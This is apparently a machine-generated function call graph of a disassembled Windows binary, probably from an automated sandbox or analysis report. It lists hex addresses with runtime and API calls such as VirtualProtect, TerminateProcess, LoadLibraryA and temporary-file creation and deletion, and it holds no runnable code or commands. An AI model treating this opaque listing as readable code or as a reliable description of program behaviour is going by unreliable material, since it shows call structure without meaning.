94894 bbe9c7 94890->94894 95187 baa69d 48 API calls 94891->95187 95169 ba9b72 48 API calls 94892->95169 94897 b6936c 81 API calls 94894->94897 94894->94915 94896 bbe949 95170 b745e0 94896->95170 94900 bbe9e1 94897->94900 94898 bbe99b 95188 b6bc74 48 API calls 94898->95188 94902 b6bdfa 48 API calls 94900->94902 94904 bbea05 CharUpperBuffW 94902->94904 94903 bbe9a3 Mailbox 95189 b73200 94903->95189 94905 bbea1f 94904->94905 94907 bbea72 94905->94907 94908 bbea26 94905->94908 94909 b6936c 81 API calls 94907->94909 95215 ba9b72 48 API calls 94908->95215 94910 bbea7a 94909->94910 95216 b61caa 49 API calls 94910->95216 94913 bbea54 94914 b745e0 334 API calls 94913->94914 94914->94915 94915->94746 94916 bbea84 94916->94915 94917 b6936c 81 API calls 94916->94917 94918 bbea9f 94917->94918 95217 b6bc74 48 API calls 94918->95217 94920 bbeaaf 94921 b73200 334 API calls 94920->94921 94921->94915 94922->94774 94923->94746 94925 b66f00 94924->94925 94926 b66ef8 94924->94926 94925->94754 96301 b6dd47 48 API calls ___crtGetEnvironmentStringsW 94926->96301 94928->94754 94929->94745 94930->94754 94931->94754 94932->94765 94933->94756 94934->94775 94935->94799 94936->94796 94937->94799 94938->94799 94939->94812 94940->94811 94941->94811 94942->94821 94943->94814 94944->94827 94946 b69384 94945->94946 94963 b69380 94945->94963 94947 bd4cbd __i64tow 94946->94947 94948 bd4bbf 94946->94948 94949 b69398 94946->94949 94956 b693b0 __itow Mailbox _wcscpy 94946->94956 94950 bd4bc8 94948->94950 94951 bd4ca5 94948->94951 94994 b8172b 80 API calls 3 library calls 94949->94994 94950->94956 94957 bd4be7 94950->94957 94995 b8172b 80 API calls 3 library calls 94951->94995 94953 b7f4ea 48 API calls 94955 b693ba 94953->94955 94959 b6ce19 48 API calls 94955->94959 94955->94963 94956->94953 94958 b7f4ea 48 API calls 94957->94958 94960 bd4c04 94958->94960 94959->94963 94961 b7f4ea 48 API calls 94960->94961 94962 bd4c2a 94961->94962 94962->94963 94964 b6ce19 48 API calls 94962->94964 94963->94831 94964->94963 94996 b66b0f 94965->94996 94967 b6b69b 95003 b6ba85 94967->95003 94970 b6b6b5 Mailbox 94970->94833 94972 b6bcce 48 API calls 94988 b6b495 94972->94988 94973 b6ba85 48 API calls 94973->94988 94974 bd397b 95014 ba26bc 88 API calls 4 library calls 94974->95014 94977 b6b9e4 95015 ba26bc 88 API calls 4 library calls 94977->95015 94978 bd3973 94978->94970 94981 bd3989 94982 b6ba85 48 API calls 94981->94982 94982->94978 94983 bd3909 94985 b66b4a 48 API calls 94983->94985 94984 b6bb85 48 API calls 94984->94988 94987 bd3914 94985->94987 94991 b7f4ea 48 API calls 94987->94991 94988->94967 94988->94972 94988->94973 94988->94974 94988->94977 94988->94983 94988->94984 94989 b6bdfa 48 API calls 94988->94989 94992 bd3939 ___crtGetEnvironmentStringsW 94988->94992 95001 b6c413 59 API calls 94988->95001 95002 b6bc74 48 API calls 94988->95002 95011 b6c6a5 49 API calls 94988->95011 95012 b6c799 48 API calls ___crtGetEnvironmentStringsW 94988->95012 94990 b6b66c CharUpperBuffW 94989->94990 94990->94988 94991->94992 95013 ba26bc 88 API calls 4 library calls 94992->95013 94993->94837 94994->94956 94995->94956 94997 b7f4ea 48 API calls 94996->94997 94998 b66b34 94997->94998 94999 b66b4a 48 API calls 94998->94999 95000 b66b43 94999->95000 95000->94988 95001->94988 95002->94988 95005 b6bb25 95003->95005 95008 b6ba98 ___crtGetEnvironmentStringsW 95003->95008 95004 b7f4ea 48 API calls 95007 b6ba9f 95004->95007 95006 b7f4ea 48 API calls 95005->95006 95006->95008 95009 b7f4ea 48 API calls 95007->95009 95010 b6bac8 95007->95010 95008->95004 95009->95010 95010->94970 95011->94988 95012->94988 95013->94978 95014->94981 95015->94978 95017 b6936c 81 API calls 95016->95017 95018 bbf8ea 95017->95018 95020 bbf92c Mailbox 95018->95020 95052 bc0567 95018->95052 95020->94840 95021 bbfb8b 95022 bbfcfa 95021->95022 95024 bbfb95 95021->95024 95115 bc0688 89 API calls Mailbox 95022->95115 95065 bbf70a 95024->95065 95026 bbfd07 95026->95024 95027 bbfd13 95026->95027 95027->95020 95028 b6936c 81 API calls 95045 bbf984 Mailbox 95028->95045 95033 bbfbc9 95079 b7ed18 95033->95079 95036 bbfbfd 95086 b7c050 95036->95086 95037 bbfbe3 95085 bacc5c 86 API calls 4 library calls 95037->95085 95040 bbfbee GetCurrentProcess TerminateProcess 95040->95036 95041 bbfc14 95051 bbfc3e 95041->95051 95097 b71b90 95041->95097 95043 bbfd65 95043->95020 95048 bbfd7e FreeLibrary 95043->95048 95044 bbfc2d 95113 bc040f 105 API calls _free 95044->95113 95045->95020 95045->95021 95045->95028 95045->95045 95083 bc29e8 48 API calls ___crtGetEnvironmentStringsW 95045->95083 95084 bbfda5 60 API calls 2 library calls 95045->95084 95047 b71b90 48 API calls 95047->95051 95048->95020 95051->95043 95051->95047 95114 b6dcae 50 API calls Mailbox 95051->95114 95116 bc040f 105 API calls _free 95051->95116 95053 b6bdfa 48 API calls 95052->95053 95054 bc0582 CharLowerBuffW 95053->95054 95117 ba1f11 95054->95117 95058 b6d7f7 48 API calls 95059 bc05bb 95058->95059 95124 b669e9 48 API calls ___crtGetEnvironmentStringsW 95059->95124 95061 bc05d2 95062 b6b18b 48 API calls 95061->95062 95063 bc05de Mailbox 95062->95063 95064 bc061a Mailbox 95063->95064 95125 bbfda5 60 API calls 2 library calls 95063->95125 95064->95045 95066 bbf725 95065->95066 95067 bbf77a 95065->95067 95068 b7f4ea 48 API calls 95066->95068 95071 bc0828 95067->95071 95070 bbf747 95068->95070 95069 b7f4ea 48 API calls 95069->95070 95070->95067 95070->95069 95072 bc0a53 Mailbox 95071->95072 95078 bc084b _strcat _wcscpy __NMSG_WRITE 95071->95078 95072->95033 95073 b6d286 48 API calls 95073->95078 95074 b6cf93 58 API calls 95074->95078 95075 b6936c 81 API calls 95075->95078 95076 b8395c 47 API calls _W_store_winword 95076->95078 95078->95072 95078->95073 95078->95074 95078->95075 95078->95076 95128 ba8035 50 API calls __NMSG_WRITE 95078->95128 95081 b7ed2d 95079->95081 95080 b7edc5 VirtualProtect 95082 b7ed93 95080->95082 95081->95080 95081->95082 95082->95036 95082->95037 95083->95045 95084->95045 95085->95040 95087 b7c064 95086->95087 95089 b7c069 Mailbox 95086->95089 95129 b7c1af 48 API calls 95087->95129 95095 b7c077 95089->95095 95130 b7c15c 48 API calls 95089->95130 95091 b7f4ea 48 API calls 95093 b7c108 95091->95093 95092 b7c152 95092->95041 95094 b7f4ea 48 API calls 95093->95094 95096 b7c113 95094->95096 95095->95091 95095->95092 95096->95041 95098 b71cf6 95097->95098 95099 b71ba2 95097->95099 95098->95044 95101 b7f4ea 48 API calls 95099->95101 95112 b71bae 95099->95112 95102 bd49c4 95101->95102 95104 b7f4ea 48 API calls 95102->95104 95103 b71c5d 95103->95044 95106 bd49cf 95104->95106 95105 b7f4ea 48 API calls 95108 b71c9f 95105->95108 95111 b7f4ea 48 API calls 95106->95111 95106->95112 95107 b71bb9 95107->95103 95107->95105 95109 b71cb2 95108->95109 95131 b62925 48 API calls 95108->95131 95109->95044 95111->95106 95112->95107 95132 b7c15c 48 API calls 95112->95132 95113->95051 95114->95051 95115->95026 95116->95051 95118 ba1f3b __NMSG_WRITE 95117->95118 95119 ba1f79 95118->95119 95121 ba1f6f 95118->95121 95123 ba1ffa 95118->95123 95119->95058 95119->95063 95121->95119 95126 b7d37a 60 API calls 95121->95126 95123->95119 95127 b7d37a 60 API calls 95123->95127 95124->95061 95125->95064 95126->95121 95127->95123 95128->95078 95129->95089 95130->95095 95131->95109 95132->95107 95134 b6d654 95133->95134 95142 b6d67e 95133->95142 95135 b6d65b 95134->95135 95136 b6d6c2 95134->95136 95137 b6d666 95135->95137 95141 b6d6ab 95135->95141 95136->95141 95156 b7dce0 53 API calls 95136->95156 95154 b6d9a0 53 API calls __cinit 95137->95154 95141->95142 95155 b7dce0 53 API calls 95141->95155 95142->94864 95143->94864 95145 b6511f 95144->95145 95146 bd1be7 95144->95146 95157 b6b384 95145->95157 95166 b9a58f 48 API calls ___crtGetEnvironmentStringsW 95146->95166 95149 bd1bf1 95151 b66eed 48 API calls 95149->95151 95150 b6512b 95150->94854 95152 bd1bf9 Mailbox 95151->95152 95153->94855 95154->95142 95155->95142 95156->95141 95158 b6b392 95157->95158 95165 b6b3c5 ___crtGetEnvironmentStringsW 95157->95165 95159 b6b3fd 95158->95159 95160 b6b3b8 95158->95160 95158->95165 95162 b7f4ea 48 API calls 95159->95162 95161 b6bb85 48 API calls 95160->95161 95161->95165 95163 b6b407 95162->95163 95164 b7f4ea 48 API calls 95163->95164 95164->95165 95165->95150 95166->95149 95167->94915 95168->94887 95169->94896 95171 b74637 95170->95171 95172 b7479f 95170->95172 95174 b74643 95171->95174 95175 bd6e05 95171->95175 95173 b6ce19 48 API calls 95172->95173 95182 b746e4 Mailbox 95173->95182 95218 b74300 95174->95218 95177 bbe822 335 API calls 95175->95177 95179 bd6e11 95177->95179 95178 b74659 95178->95179 95180 b74739 Mailbox 95178->95180 95178->95182 95179->95180 95283 bacc5c 86 API calls 4 library calls 95179->95283 95180->94915 95185 bb6ff0 335 API calls 95182->95185 95233 bafa0c 95182->95233 95274 b64252 95182->95274 95280 ba6524 95182->95280 95185->95180 95187->94898 95188->94903 96056 b6bd30 95189->96056 95191 b73267 95197 b73313 Mailbox ___crtGetEnvironmentStringsW 95191->95197 96129 b7c36b 86 API calls 95191->96129 95193 bacc5c 86 API calls 95193->95197 95196 b6fe30 335 API calls 95196->95197 95197->95193 95197->95196 95198 b6d645 53 API calls 95197->95198 95205 b7c3c3 48 API calls 95197->95205 95206 b7f4ea 48 API calls 95197->95206 95207 b6dcae 50 API calls 95197->95207 95211 b7c2d6 48 API calls 95197->95211 95212 b66eed 48 API calls 95197->95212 95214 b73635 Mailbox 95197->95214 96061 b62b7a 95197->96061 96068 b6e8d0 95197->96068 96130 b6d9a0 53 API calls __cinit 95197->96130 96131 b6d8c0 53 API calls 95197->96131 96132 bbf320 335 API calls 95197->96132 96133 bbf5ee 335 API calls 95197->96133 96134 b61caa 49 API calls 95197->96134 96135 bbcda2 82 API calls Mailbox 95197->96135 96136 ba80e3 53 API calls 95197->96136 96137 b6d764 55 API calls 95197->96137 96138 b6d6e9 95197->96138 96142 bac942 50 API calls 95197->96142 95198->95197 95205->95197 95206->95197 95207->95197 95211->95197 95212->95197 95214->94915 95215->94913 95216->94916 95217->94920 95219 bd6e60 95218->95219 95222 b7432c 95218->95222 95285 bacc5c 86 API calls 4 library calls 95219->95285 95221 bd6e71 95286 bacc5c 86 API calls 4 library calls 95221->95286 95222->95221 95229 b74366 ___crtGetEnvironmentStringsW 95222->95229 95224 b74435 95230 b74445 95224->95230 95284 bbcda2 82 API calls Mailbox 95224->95284 95226 b7f4ea 48 API calls 95226->95229 95227 b744b1 95227->95178 95228 b6fe30 335 API calls 95228->95229 95229->95224 95229->95226 95229->95228 95229->95230 95231 bd6ebd 95229->95231 95230->95178 95287 bacc5c 86 API calls 4 library calls 95231->95287 95234 bafa1c __ftell_nolock 95233->95234 95235 bafa44 95234->95235 95376 b6d286 48 API calls 95234->95376 95237 b6936c 81 API calls 95235->95237 95238 bafa5e 95237->95238 95239 bafb68 95238->95239 95240 bafa80 95238->95240 95249 bafb92 95238->95249 95288 b641a9 95239->95288 95242 b6936c 81 API calls 95240->95242 95248 bafa8c _wcscpy _wcschr 95242->95248 95244 bafb8e 95245 b6936c 81 API calls 95244->95245 95244->95249 95247 bafbc7 95245->95247 95246 b641a9 136 API calls 95246->95244 95312 b81dfc 95247->95312 95251 bafade _wcscat 95248->95251 95253 bafab0 _wcscat _wcscpy 95248->95253 95249->95180 95252 b6936c 81 API calls 95251->95252 95254 bafafc _wcscpy 95252->95254 95255 b6936c 81 API calls 95253->95255 95377 ba72cb GetFileAttributesW 95254->95377 95255->95251 95257 bafb1c __NMSG_WRITE 95257->95249 95258 b6936c 81 API calls 95257->95258 95260 bafb48 95258->95260 95259 bafbeb _wcscat _wcscpy 95262 b6936c 81 API calls 95259->95262 95378 ba60dd 77 API calls 4 library calls 95260->95378 95264 bafc82 95262->95264 95263 bafb5c 95263->95249 95315 ba690b 95264->95315 95266 bafca2 95267 ba6524 3 API calls 95266->95267 95268 bafcb1 95267->95268 95269 b6936c 81 API calls 95268->95269 95272 bafce2 95268->95272 95270 bafccb 95269->95270 95321 babfa4 95270->95321 95273 b64252 84 API calls 95272->95273 95273->95249 95275 b6425c 95274->95275 95277 b64263 95274->95277 95276 b835e4 __fcloseall 83 API calls 95275->95276 95276->95277 95278 b64272 95277->95278 95279 b64283 FreeLibrary 95277->95279 95278->95180 95279->95278 96052 ba6ca9 GetFileAttributesW 95280->96052 95283->95180 95284->95227 95285->95221 95286->95230 95287->95230 95379 b64214 95288->95379 95293 b641d4 LoadLibraryExW 95389 b64291 95293->95389 95294 bd4f73 95295 b64252 84 API calls 95294->95295 95297 bd4f7a 95295->95297 95300 b64291 3 API calls 95297->95300 95302 bd4f82 95300->95302 95301 b641fb 95301->95302 95303 b64207 95301->95303 95415 b644ed 95302->95415 95304 b64252 84 API calls 95303->95304 95306 b6420c 95304->95306 95306->95244 95306->95246 95309 bd4fa9 95423 b64950 95309->95423 95725 b81e46 95312->95725 95316 ba6918 _wcschr __ftell_nolock 95315->95316 95317 ba692e _wcscat _wcscpy 95316->95317 95318 b81dfc __wsplitpath 47 API calls 95316->95318 95317->95266 95319 ba695d 95318->95319 95320 b81dfc __wsplitpath 47 API calls 95319->95320 95320->95317 95322 babfb1 __ftell_nolock 95321->95322 95323 b7f4ea 48 API calls 95322->95323 95324 bac00e 95323->95324 95325 b647b7 48 API calls 95324->95325 95326 bac018 95325->95326 95327 babdb4 GetSystemTimeAsFileTime 95326->95327 95328 bac023 95327->95328 95329 b64517 83 API calls 95328->95329 95330 bac036 _wcscmp 95329->95330 95331 bac05a 95330->95331 95332 bac107 95330->95332 95781 bac56d 95331->95781 95334 bac56d 94 API calls 95332->95334 95336 bac0d3 _wcscat 95334->95336 95338 b644ed 64 API calls 95336->95338 95341 bac110 95336->95341 95337 b81dfc __wsplitpath 47 API calls 95339 bac088 _wcscat _wcscpy 95337->95339 95340 bac12c 95338->95340 95345 b81dfc __wsplitpath 47 API calls 95339->95345 95342 b644ed 64 API calls 95340->95342 95341->95272 95343 bac13c 95342->95343 95344 b644ed 64 API calls 95343->95344 95346 bac157 95344->95346 95345->95336 95347 b644ed 64 API calls 95346->95347 95348 bac167 95347->95348 95349 b644ed 64 API calls 95348->95349 95350 bac182 95349->95350 95351 b644ed 64 API calls 95350->95351 95352 bac192 95351->95352 95353 b644ed 64 API calls 95352->95353 95354 bac1a2 95353->95354 95355 b644ed 64 API calls 95354->95355 95356 bac1b2 95355->95356 95751 bac71a GetTempPathW GetTempFileNameW 95356->95751 95358 bac1be 95359 b83499 117 API calls 95358->95359 95369 bac1cf 95359->95369 95360 bac289 95765 b835e4 95360->95765 95362 bac294 95364 bac29a DeleteFileW 95362->95364 95365 bac2ae 95362->95365 95363 b644ed 64 API calls 95363->95369 95364->95341 95366 bac342 CopyFileW 95365->95366 95371 bac2b8 95365->95371 95367 bac36a DeleteFileW 95366->95367 95368 bac358 DeleteFileW 95366->95368 95778 bac6d9 CreateFileW 95367->95778 95368->95341 95369->95341 95369->95360 95369->95363 95752 b82aae 95369->95752 95787 bab965 118 API calls __fcloseall 95371->95787 95374 bac32d 95374->95367 95375 bac331 DeleteFileW 95374->95375 95375->95341 95376->95235 95377->95257 95378->95263 95428 b64339 95379->95428 95382 b6423c 95384 b64244 FreeLibrary 95382->95384 95385 b641bb 95382->95385 95384->95385 95386 b83499 95385->95386 95436 b834ae 95386->95436 95388 b641c8 95388->95293 95388->95294 95639 b642e4 95389->95639 95393 b642c1 FreeLibrary 95394 b641ec 95393->95394 95396 b64380 95394->95396 95395 b642b8 95395->95393 95395->95394 95397 b7f4ea 48 API calls 95396->95397 95398 b64395 95397->95398 95399 b647b7 48 API calls 95398->95399 95400 b643a1 ___crtGetEnvironmentStringsW 95399->95400 95401 b643dc 95400->95401 95402 b644d1 95400->95402 95403 b64499 95400->95403 95404 b64950 57 API calls 95401->95404 95658 bac750 93 API calls 95402->95658 95647 b6406b CreateStreamOnHGlobal 95403->95647 95408 b643e5 95404->95408 95407 b644ed 64 API calls 95407->95408 95408->95407 95409 b64479 95408->95409 95411 bd4ed7 95408->95411 95653 b64517 95408->95653 95409->95301 95412 b64517 83 API calls 95411->95412 95413 bd4eeb 95412->95413 95414 b644ed 64 API calls 95413->95414 95414->95409 95416 b644ff 95415->95416 95417 bd4fc0 95415->95417 95682 b8381e 95416->95682 95420 babf5a 95702 babdb4 95420->95702 95422 babf70 95422->95309 95424 b6495f 95423->95424 95425 bd5002 95423->95425 95707 b83e65 95424->95707 95427 b64967 95432 b6434b 95428->95432 95431 b64321 LoadLibraryA GetProcAddress 95431->95382 95433 b6422f 95432->95433 95434 b64354 LoadLibraryA 95432->95434 95433->95382 95433->95431 95434->95433 95435 b64365 GetProcAddress 95434->95435 95435->95433 95438 b834ba __tzset_nolock 95436->95438 95437 b834cd 95484 b87c0e 47 API calls __getptd_noexit 95437->95484 95438->95437 95440 b834fe 95438->95440 95455 b8e4c8 95440->95455 95441 b834d2 95485 b86e10 8 API calls __cftof_l 95441->95485 95444 b83503 95445 b83519 95444->95445 95446 b8350c 95444->95446 95448 b83543 95445->95448 95449 b83523 95445->95449 95486 b87c0e 47 API calls __getptd_noexit 95446->95486 95469 b8e5e0 95448->95469 95487 b87c0e 47 API calls __getptd_noexit 95449->95487 95450 b834dd __tzset_nolock @_EH4_CallFilterFunc@8 95450->95388 95456 b8e4d4 __tzset_nolock 95455->95456 95489 b87cf4 95456->95489 95458 b8e552 95496 b8e5d7 95458->95496 95459 b8e559 95525 b869d0 47 API calls _W_store_winword 95459->95525 95462 b8e560 95462->95458 95464 b8e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 95462->95464 95463 b8e5cc __tzset_nolock 95463->95444 95464->95458 95467 b8e4e2 95467->95458 95467->95459 95499 b87d7c 95467->95499 95523 b84e5b 48 API calls __lock 95467->95523 95524 b84ec5 LeaveCriticalSection LeaveCriticalSection _doexit 95467->95524 95478 b8e600 __wopenfile 95469->95478 95470 b8e61a 95544 b87c0e 47 API calls __getptd_noexit 95470->95544 95472 b8e7d5 95472->95470 95476 b8e838 95472->95476 95473 b8e61f 95545 b86e10 8 API calls __cftof_l 95473->95545 95475 b8354e 95488 b83570 LeaveCriticalSection LeaveCriticalSection _fseek 95475->95488 95541 b963c9 95476->95541 95478->95470 95478->95472 95478->95478 95546 b8185b 59 API calls 2 library calls 95478->95546 95480 b8e7ce 95480->95472 95547 b8185b 59 API calls 2 library calls 95480->95547 95482 b8e7ed 95482->95472 95548 b8185b 59 API calls 2 library calls 95482->95548 95484->95441 95485->95450 95486->95450 95487->95450 95488->95450 95490 b87d18 EnterCriticalSection 95489->95490 95491 b87d05 95489->95491 95490->95467 95492 b87d7c __mtinitlocknum 46 API calls 95491->95492 95493 b87d0b 95492->95493 95493->95490 95526 b8115b 47 API calls 3 library calls 95493->95526 95527 b87e58 LeaveCriticalSection 95496->95527 95498 b8e5de 95498->95463 95500 b87d88 __tzset_nolock 95499->95500 95501 b87da9 95500->95501 95502 b87d91 95500->95502 95507 b87e11 __tzset_nolock 95501->95507 95515 b87da7 95501->95515 95528 b881c2 47 API calls __NMSG_WRITE 95502->95528 95505 b87d96 95529 b8821f 47 API calls 6 library calls 95505->95529 95507->95467 95508 b87dbd 95510 b87dd3 95508->95510 95511 b87dc4 95508->95511 95509 b87d9d 95530 b81145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 95509->95530 95514 b87cf4 __lock 46 API calls 95510->95514 95532 b87c0e 47 API calls __getptd_noexit 95511->95532 95517 b87dda 95514->95517 95515->95501 95531 b869d0 47 API calls _W_store_winword 95515->95531 95516 b87dc9 95516->95507 95518 b87de9 InitializeCriticalSectionAndSpinCount 95517->95518 95519 b87dfe 95517->95519 95521 b87e04 95518->95521 95533 b81c9d 95519->95533 95539 b87e1a LeaveCriticalSection _doexit 95521->95539 95523->95467 95524->95467 95525->95462 95527->95498 95528->95505 95529->95509 95531->95508 95532->95516 95534 b81ccf _free 95533->95534 95535 b81ca6 RtlFreeHeap 95533->95535 95534->95521 95535->95534 95536 b81cbb 95535->95536 95540 b87c0e 47 API calls __getptd_noexit 95536->95540 95538 b81cc1 GetLastError 95538->95534 95539->95507 95540->95538 95549 b95bb1 95541->95549 95543 b963e2 95543->95475 95544->95473 95545->95475 95546->95480 95547->95482 95548->95472 95550 b95bbd __tzset_nolock 95549->95550 95551 b95bcf 95550->95551 95554 b95c06 95550->95554 95636 b87c0e 47 API calls __getptd_noexit 95551->95636 95553 b95bd4 95637 b86e10 8 API calls __cftof_l 95553->95637 95560 b95c78 95554->95560 95557 b95c23 95638 b95c4c LeaveCriticalSection __unlock_fhandle 95557->95638 95558 b95bde __tzset_nolock 95558->95543 95561 b95c98 95560->95561 95562 b8273b __wsopen_helper 47 API calls 95561->95562 95566 b95cb4 95562->95566 95563 b95deb 95564 b86e20 __invoke_watson 8 API calls 95563->95564 95565 b963c8 95564->95565 95568 b95bb1 __wsopen_helper 104 API calls 95565->95568 95566->95563 95567 b95cee 95566->95567 95579 b95d11 95566->95579 95569 b87bda __chsize_nolock 47 API calls 95567->95569 95570 b963e2 95568->95570 95571 b95cf3 95569->95571 95570->95557 95572 b87c0e __cftof_l 47 API calls 95571->95572 95573 b95d00 95572->95573 95575 b86e10 __cftof_l 8 API calls 95573->95575 95574 b95dcf 95576 b87bda __chsize_nolock 47 API calls 95574->95576 95577 b95d0a 95575->95577 95578 b95dd4 95576->95578 95577->95557 95580 b87c0e __cftof_l 47 API calls 95578->95580 95579->95574 95583 b95dad 95579->95583 95581 b95de1 95580->95581 95582 b86e10 __cftof_l 8 API calls 95581->95582 95582->95563 95584 b8a979 __wsopen_helper 52 API calls 95583->95584 95585 b95e7b 95584->95585 95586 b95e85 95585->95586 95587 b95ea6 95585->95587 95588 b87bda __chsize_nolock 47 API calls 95586->95588 95589 b95b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 95587->95589 95590 b95e8a 95588->95590 95600 b95ec8 95589->95600 95591 b87c0e __cftof_l 47 API calls 95590->95591 95593 b95e94 95591->95593 95592 b95f46 GetFileType 95594 b95f51 GetLastError 95592->95594 95595 b95f93 95592->95595 95598 b87c0e __cftof_l 47 API calls 95593->95598 95599 b87bed __dosmaperr 47 API calls 95594->95599 95604 b8ac0b __set_osfhnd 48 API calls 95595->95604 95596 b95f14 GetLastError 95597 b87bed __dosmaperr 47 API calls 95596->95597 95601 b95f39 95597->95601 95598->95577 95602 b95f78 CloseHandle 95599->95602 95600->95592 95600->95596 95603 b95b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 95600->95603 95607 b87c0e __cftof_l 47 API calls 95601->95607 95602->95601 95605 b95f86 95602->95605 95606 b95f09 95603->95606 95610 b95fb1 95604->95610 95608 b87c0e __cftof_l 47 API calls 95605->95608 95606->95592 95606->95596 95607->95563 95609 b95f8b 95608->95609 95609->95601 95611 b9616c 95610->95611 95612 b8f82f __lseeki64_nolock 49 API calls 95610->95612 95625 b96032 95610->95625 95611->95563 95613 b9633f CloseHandle 95611->95613 95614 b9601b 95612->95614 95615 b95b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 95613->95615 95617 b87bda __chsize_nolock 47 API calls 95614->95617 95632 b9603a 95614->95632 95616 b96366 95615->95616 95618 b9636e GetLastError 95616->95618 95635 b961f6 95616->95635 95617->95625 95619 b87bed __dosmaperr 47 API calls 95618->95619 95620 b9637a 95619->95620 95624 b8ab1e __free_osfhnd 48 API calls 95620->95624 95621 b8ee0e 59 API calls __wsopen_helper 95621->95632 95622 b8ea9c __close_nolock 50 API calls 95622->95632 95623 b96f40 __chsize_nolock 81 API calls 95623->95632 95624->95635 95625->95611 95626 b8af61 __flush 78 API calls 95625->95626 95629 b8f82f 49 API calls __lseeki64_nolock 95625->95629 95625->95632 95626->95625 95627 b961e9 95630 b8ea9c __close_nolock 50 API calls 95627->95630 95628 b961d2 95628->95611 95629->95625 95631 b961f0 95630->95631 95634 b87c0e __cftof_l 47 API calls 95631->95634 95632->95621 95632->95622 95632->95623 95632->95625 95632->95627 95632->95628 95633 b8f82f 49 API calls __lseeki64_nolock 95632->95633 95633->95632 95634->95635 95635->95563 95636->95553 95637->95558 95638->95558 95643 b642f6 95639->95643 95642 b642cc LoadLibraryA GetProcAddress 95642->95395 95644 b642aa 95643->95644 95645 b642ff LoadLibraryA 95643->95645 95644->95395 95644->95642 95645->95644 95646 b64310 GetProcAddress 95645->95646 95646->95644 95648 b64085 FindResourceExW 95647->95648 95649 b640a2 95647->95649 95648->95649 95650 bd4f16 LoadResource 95648->95650 95649->95401 95650->95649 95651 bd4f2b SizeofResource 95650->95651 95651->95649 95652 bd4f3f LockResource 95651->95652 95652->95649 95654 b64526 95653->95654 95655 bd4fe0 95653->95655 95659 b83a8d 95654->95659 95657 b64534 95657->95408 95658->95401 95660 b83a99 __tzset_nolock 95659->95660 95661 b83aa7 95660->95661 95663 b83acd 95660->95663 95672 b87c0e 47 API calls __getptd_noexit 95661->95672 95674 b84e1c 95663->95674 95665 b83aac 95673 b86e10 8 API calls __cftof_l 95665->95673 95669 b83ae2 95681 b83b04 LeaveCriticalSection LeaveCriticalSection _fseek 95669->95681 95671 b83ab7 __tzset_nolock 95671->95657 95672->95665 95673->95671 95675 b84e2c 95674->95675 95676 b84e4e EnterCriticalSection 95674->95676 95675->95676 95677 b84e34 95675->95677 95679 b83ad3 95676->95679 95678 b87cf4 __lock 47 API calls 95677->95678 95678->95679 95680 b839fe 81 API calls 4 library calls 95679->95680 95680->95669 95681->95671 95685 b83839 95682->95685 95684 b64510 95684->95420 95686 b83845 __tzset_nolock 95685->95686 95687 b83888 95686->95687 95688 b8385b _memset 95686->95688 95689 b83880 __tzset_nolock 95686->95689 95690 b84e1c __lock_file 48 API calls 95687->95690 95698 b87c0e 47 API calls __getptd_noexit 95688->95698 95689->95684 95692 b8388e 95690->95692 95700 b8365b 62 API calls 6 library calls 95692->95700 95694 b83875 95699 b86e10 8 API calls __cftof_l 95694->95699 95695 b838a4 95701 b838c2 LeaveCriticalSection LeaveCriticalSection _fseek 95695->95701 95698->95694 95699->95689 95700->95695 95701->95689 95705 b8344a GetSystemTimeAsFileTime 95702->95705 95704 babdc3 95704->95422 95706 b83478 __aulldiv 95705->95706 95706->95704 95708 b83e71 __tzset_nolock 95707->95708 95709 b83e7f 95708->95709 95710 b83e94 95708->95710 95721 b87c0e 47 API calls __getptd_noexit 95709->95721 95712 b84e1c __lock_file 48 API calls 95710->95712 95714 b83e9a 95712->95714 95713 b83e84 95722 b86e10 8 API calls __cftof_l 95713->95722 95723 b83b0c 55 API calls 4 library calls 95714->95723 95717 b83ea5 95724 b83ec5 LeaveCriticalSection LeaveCriticalSection _fseek 95717->95724 95719 b83eb7 95720 b83e8f __tzset_nolock 95719->95720 95720->95427 95721->95713 95722->95720 95723->95717 95724->95719 95726 b81e55 95725->95726 95727 b81e61 95725->95727 95726->95727 95740 b81ed4 95726->95740 95744 b89d6b 47 API calls __cftof_l 95726->95744 95749 b87c0e 47 API calls __getptd_noexit 95727->95749 95729 b82019 95733 b81e41 95729->95733 95750 b86e10 8 API calls __cftof_l 95729->95750 95732 b81fa0 95732->95727 95732->95733 95735 b81fb0 95732->95735 95733->95259 95734 b81f5f 95734->95727 95736 b81f7b 95734->95736 95746 b89d6b 47 API calls __cftof_l 95734->95746 95748 b89d6b 47 API calls __cftof_l 95735->95748 95736->95727 95736->95733 95739 b81f91 95736->95739 95747 b89d6b 47 API calls __cftof_l 95739->95747 95740->95727 95743 b81f41 95740->95743 95745 b89d6b 47 API calls __cftof_l 95740->95745 95743->95732 95743->95734 95744->95740 95745->95743 95746->95736 95747->95733 95748->95733 95749->95729 95750->95733 95751->95358 95753 b82aba __tzset_nolock 95752->95753 95754 b82aec 95753->95754 95755 b82ad4 95753->95755 95756 b82ae4 __tzset_nolock 95753->95756 95757 b84e1c __lock_file 48 API calls 95754->95757 95800 b87c0e 47 API calls __getptd_noexit 95755->95800 95756->95369 95759 b82af2 95757->95759 95788 b82957 95759->95788 95760 b82ad9 95801 b86e10 8 API calls __cftof_l 95760->95801 95766 b835f0 __tzset_nolock 95765->95766 95767 b8361c 95766->95767 95768 b83604 95766->95768 95771 b84e1c __lock_file 48 API calls 95767->95771 95774 b83614 __tzset_nolock 95767->95774 95978 b87c0e 47 API calls __getptd_noexit 95768->95978 95770 b83609 95979 b86e10 8 API calls __cftof_l 95770->95979 95773 b8362e 95771->95773 95962 b83578 95773->95962 95774->95362 95779 bac6ff SetFileTime CloseHandle 95778->95779 95780 bac715 95778->95780 95779->95780 95780->95341 95786 bac581 __tzset_nolock _wcscmp 95781->95786 95782 bac05f 95782->95337 95782->95341 95783 b644ed 64 API calls 95783->95786 95784 babf5a GetSystemTimeAsFileTime 95784->95786 95785 b64517 83 API calls 95785->95786 95786->95782 95786->95783 95786->95784 95786->95785 95787->95374 95789 b82966 95788->95789 95794 b82984 95788->95794 95790 b82974 95789->95790 95789->95794 95798 b8299c ___crtGetEnvironmentStringsW 95789->95798 95835 b87c0e 47 API calls __getptd_noexit 95790->95835 95792 b82979 95836 b86e10 8 API calls __cftof_l 95792->95836 95802 b82b24 LeaveCriticalSection LeaveCriticalSection _fseek 